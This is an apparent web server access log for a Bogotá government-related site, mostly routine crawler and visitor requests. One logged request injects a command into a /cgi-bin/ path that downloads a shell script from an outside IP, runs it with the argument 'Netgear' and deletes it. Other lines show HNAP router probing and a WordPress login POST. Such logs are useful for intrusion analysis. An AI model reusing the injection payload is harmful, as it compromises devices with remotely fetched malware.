190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
207.46.13.190 - - [12/Oct/2022:05:13:00 -0500] "GET /BLA/resoluciones/00000017.tif HTTP/1.1" 404 1018
195.178.120.41 - - [12/Oct/2022:05:14:13 -0500] "GET / HTTP/1.1" 200 319
195.178.120.41 - - [12/Oct/2022:05:14:27 -0500] "GET /cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F45.95.55.214%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+Netgear%3Brm+-rf+wget.sh HTTP/1.1" 404 1018
66.249.73.97 - - [12/Oct/2022:05:14:46 -0500] "-" 408 -
172.22.2.4 - - [12/Oct/2022:05:13:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:14:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.89 - - [12/Oct/2022:05:16:47 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12506
40.77.202.143 - - [12/Oct/2022:05:16:48 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
40.77.202.49 - - [12/Oct/2022:05:16:49 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
40.77.202.165 - - [12/Oct/2022:05:16:49 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
40.77.202.88 - - [12/Oct/2022:05:16:50 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
40.77.202.151 - - [12/Oct/2022:05:16:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=2JsqkgQYO6XPrj9jX2EakpV+.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [12/Oct/2022:05:17:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.202.105 - - [12/Oct/2022:05:17:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=2JsqkgQYO6XPrj9jX2EakpV+.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
216.245.221.92 - - [12/Oct/2022:05:17:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.202 - - [12/Oct/2022:05:18:36 -0500] "GET /galeria/galeria/fotos/Humedal-la-Isla1G.jpg HTTP/1.1" 200 216243
87.250.224.65 - - [12/Oct/2022:05:19:04 -0500] "-" 408 -
87.250.224.35 - - [12/Oct/2022:05:19:10 -0500] "-" 408 -
213.180.203.85 - - [12/Oct/2022:05:19:15 -0500] "-" 408 -
87.250.224.120 - - [12/Oct/2022:05:19:20 -0500] "-" 408 -
5.255.253.174 - - [12/Oct/2022:05:19:35 -0500] "-" 408 -
5.45.207.133 - - [12/Oct/2022:05:19:50 -0500] "-" 408 -
213.180.203.3 - - [12/Oct/2022:05:20:20 -0500] "-" 408 -
172.121.216.234 - - [12/Oct/2022:05:21:00 -0500] "HEAD / HTTP/1.1" 200 -
34.209.237.76 - - [12/Oct/2022:05:21:02 -0500] "GET / HTTP/1.1" 200 319
34.209.237.76 - - [12/Oct/2022:05:21:03 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [12/Oct/2022:05:19:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.144 - - [12/Oct/2022:05:21:20 -0500] "-" 408 -
201.245.192.253 - - [12/Oct/2022:05:22:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:05:20:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
201.245.192.253 - - [12/Oct/2022:05:22:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44134
201.245.192.253 - - [12/Oct/2022:05:22:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
87.250.224.114 - - [12/Oct/2022:05:22:20 -0500] "-" 408 -
216.245.221.92 - - [12/Oct/2022:05:22:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.190 - - [12/Oct/2022:05:22:51 -0500] "GET /BLA/resoluciones/AUTOS%202013/2639.pdf HTTP/1.1" 200 714829
66.249.73.127 - - [12/Oct/2022:05:22:52 -0500] "-" 408 -
207.46.13.84 - - [12/Oct/2022:05:22:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/0201.tif HTTP/1.1" 200 290606
185.119.81.107 - - [12/Oct/2022:05:26:50 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [12/Oct/2022:05:26:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [12/Oct/2022:05:27:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:05:25:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Oct/2022:05:27:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:26:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.127 - - [12/Oct/2022:05:28:59 -0500] "-" 408 -
201.245.192.253 - - [12/Oct/2022:05:32:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Oct/2022:05:32:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44134
201.245.192.253 - - [12/Oct/2022:05:32:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
216.245.221.92 - - [12/Oct/2022:05:32:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:31:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:32:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
93.22.149.206 - - [12/Oct/2022:05:33:48 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
93.22.149.206 - - [12/Oct/2022:05:33:48 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
93.22.149.206 - - [12/Oct/2022:05:33:48 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.46.13.84 - - [12/Oct/2022:05:34:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000044.tif HTTP/1.1" 200 346114
207.46.13.84 - - [12/Oct/2022:05:35:46 -0500] "GET /bla/resoluciones/resoluciones%202008/2147.pdf HTTP/1.1" 200 266614
172.22.2.4 - - [12/Oct/2022:05:34:07 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62772
201.245.192.253 - - [12/Oct/2022:05:37:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:05:37:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.26 - - [12/Oct/2022:05:37:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/1642.pdf HTTP/1.1" 200 137016
172.22.2.4 - - [12/Oct/2022:05:37:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.89 - - [12/Oct/2022:05:38:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=wxmxend8yafyzamb8omqqejl.undefined?ln=primefaces&amp;v=4.0 HTTP/1.1" 200 276924
172.22.2.4 - - [12/Oct/2022:05:37:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
207.46.13.40 - - [12/Oct/2022:05:39:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=hkneby6vfynf0btxms2gk0xj.undefined?ln=primefaces&amp;v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [12/Oct/2022:05:42:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Oct/2022:05:42:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44134
201.245.192.253 - - [12/Oct/2022:05:42:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
216.245.221.92 - - [12/Oct/2022:05:42:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:05:44:22 -0500] "-" 408 -
172.22.2.4 - - [12/Oct/2022:05:42:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:43:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
201.245.192.253 - - [12/Oct/2022:05:46:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.202 - - [12/Oct/2022:05:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202022/3529.pdf HTTP/1.1" 200 387954
216.245.221.92 - - [12/Oct/2022:05:47:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.89 - - [12/Oct/2022:05:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202022/3069.pdf HTTP/1.1" 200 491468
172.22.2.4 - - [12/Oct/2022:05:48:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.14 - - [12/Oct/2022:05:50:25 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
66.249.73.127 - - [12/Oct/2022:05:50:59 -0500] "-" 408 -
172.22.2.4 - - [12/Oct/2022:05:49:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [12/Oct/2022:05:51:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.73.86 - - [12/Oct/2022:05:52:11 -0500] "-" 408 -
216.245.221.92 - - [12/Oct/2022:05:52:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.26 - - [12/Oct/2022:05:54:42 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [12/Oct/2022:05:54:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:05:56:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:05:55:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [12/Oct/2022:05:57:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.84 - - [12/Oct/2022:06:01:18 -0500] "GET /BLA/resoluciones/00001070.tif HTTP/1.1" 404 1018
193.142.146.35 - - [12/Oct/2022:06:01:29 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [12/Oct/2022:06:01:30 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
201.245.192.253 - - [12/Oct/2022:06:01:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:06:00:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Oct/2022:06:02:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:06:01:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
51.15.164.30 - - [12/Oct/2022:06:03:57 -0500] "HEAD /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 200 -
157.55.39.202 - - [12/Oct/2022:06:05:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4648.pdf HTTP/1.1" 304 -
207.46.13.213 - - [12/Oct/2022:06:05:14 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [12/Oct/2022:06:06:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:06:07:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:06:07:44 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [12/Oct/2022:06:06:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.27.148.21 - - [12/Oct/2022:06:08:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=9&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 25142
190.27.148.21 - - [12/Oct/2022:06:08:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.27.148.21 - - [12/Oct/2022:06:08:07 -0500] "GET /kwssiamovil/sm/cjson/pre?f=9&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 25142
172.22.2.4 - - [12/Oct/2022:06:07:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [12/Oct/2022:06:11:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:06:12:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:06:12:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
23.100.232.233 - - [12/Oct/2022:06:13:32 -0500] "GET /bla/resoluciones/resoluciones%202022/0490.pdf HTTP/1.1" 200 846031
172.22.2.4 - - [12/Oct/2022:06:12:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:06:12:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
